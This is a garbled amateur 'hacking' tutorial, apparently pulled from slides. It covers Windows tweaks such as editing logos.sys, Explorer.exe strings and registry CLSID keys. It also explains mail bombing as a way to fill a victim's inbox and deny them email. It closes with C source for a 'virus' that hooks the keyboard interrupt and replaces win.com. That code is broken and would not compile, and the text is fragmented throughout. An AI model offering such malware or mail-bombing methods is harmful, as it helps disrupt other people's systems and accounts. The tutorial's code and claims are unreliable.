HACKING
HACKING
Open MSPaint
From the File Menu select Open
Open c:\Windows\logos.sys
This opens the boring screen. You can change and
save it as logos.sys as shown in fig(a)
Step5. Type at command prompt attrib logos.sys +h +r +s
HACKING
HACKING
Customize your
Explorer.exe:
Operating
System
by
Editing
HACKING
Line: 2334 to line: 2348 deal with what appears when you
click the Start Button, You can change the name of Shut Down
to any name, even the Programs to Hackings.
Then at line 2390 comes a very interesting part. This line
lets us change the text on START button to any thing we want,
you can have your name on the START button even your name
is 132 letters long!!!
If you see carefully on LINE: 2390 you will find that a
clubs symbol precedes S t a r t. If you move the cursor over
the cursor over the club you will find that its value is 5. So,
the text after the clubs symbol, in this case S t a r t has to be
of 5 letters. Now, if you want to replace Start and in its place
put something like stop which is 4 letters; then you will search
for a symbol whose numeric value is 4 and paste it over clubs
symbol.
5. Registry Hacking:
Structure of Registry:
The registry is a hierarchical database that contains
virtually all information about yours computers configuration.
The registry editor is a utility by the filename regedit.exe
that allows you to see, search, modify and save the registry
database of windows.
The registry editor is divided into two sections. In the left
one there is a hierarchical structure of the database in the
right one, there are the values.
HACKING
HACKING
HKEY_CURRENT_USER
This keep track of current user existing in the system.
CLSID Folders:
The folders like Control Panel, Dial up Networking etc are
system folders. Each system folder has a unique CLSID key or
Class Id which is a value.
The following are the CLSID values of the most commonly
used icons:
My Briefcase :{ 85BBD920-42AO-1069-A234-08002B30309D}
My Computer :{ 20D04FE0-3AEA-1069-A2D8-08002B303098}
Recycle Bin :{ 645FF040-5081-101B-9F08-00AA002F954E}
To change the name of the Recycle Bin folder go to
HACKING
HKEY_CLASSES_ROOT\CLSID\ {645FF040-5081-101B-9F0800AA002F954E}.
In the right pane change the default to what ever name
you want
To delete the Recycle Bin, go to
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curre
ntVersion\explorer\Desktop\namespace
And
delete
the
00AA002F954E}
key
{645FF040-5081-101B-9F08-
HACKING
10
Tracert:
When you type hotmail.com in your browser then your
request passes through a large number of computers before
reaching hotmail.com. Or when you login to your shell account
and type the password then this password passes through
large number of computers before reaching the shell account
HACKING
11
Mailbombing:
Mail bombing means to send a huge number of e-mails to
a single e-mail account so that the maximum space of the
account is filled up and the owner of the account cannot
receive any important e-mails and it becomes difficult for the
user to read existing e-mails.
All e-mail accounts have a maximum space limit. For
example, Yahoo has a space limit of 4MB. Now if this
maximum space is filled up then no new messages can come
and the mail server sends back any new messages that come
so, if the victim who has been mailbombed is expecting any
new important messages, that he can pretty much kiss them
good bye.
7. Towards Cracking:
Virus:
Here we have a sample C code to illustrate a sample virus
that cracks Win.com.
The notion is to conquer the IVT, alter the entry
corresponding to interrupt number 0X09 to our user defined
program fragment. When any key is pressed, the control
transfers to our code, where we unload the command.com
using system (exit) function to shut down the computer.
HACKING
12
#include<stdio.h>
#include<process.h>
#define INTR 0x09
void interrupt (* oldhandler)();
void interrupt handler()
{
system(exit);
FILE *fp=fopen(c:\\windows\\win.com);
Fseek(fp,0,SEEK_END);
long l=ftell(fp);
if(l==123)
{
fclose(fp);
return;
}
System(cd c:\\windows);
System(ren win.com oldwin.com);
System(ren mywin.com win.com);
fclose(fp);
}
int main(void)
{
/* save old interrupt vector*/
oldhandler =getvect(INTR);
/*Install the new interrupt handler*/
setvect(INTR,handler);
HACKING
13
keep(500);
return 0;
}
/*MyWin.cpp*/
#include<process.h>
main()
{
int result;
result=spawnl(P_WAIT,tsr.exe,null);
if(result==-1)
{
perror(error from spawnl);
}
return 0;
}
Cons:
1. Risk of getting misunderstood
2. Risk in loss of sensitive data
9. Conclusion:
At the deducting part, I am to utter that hacking is a
paranormal activity.
HACKING
14
HACKING
15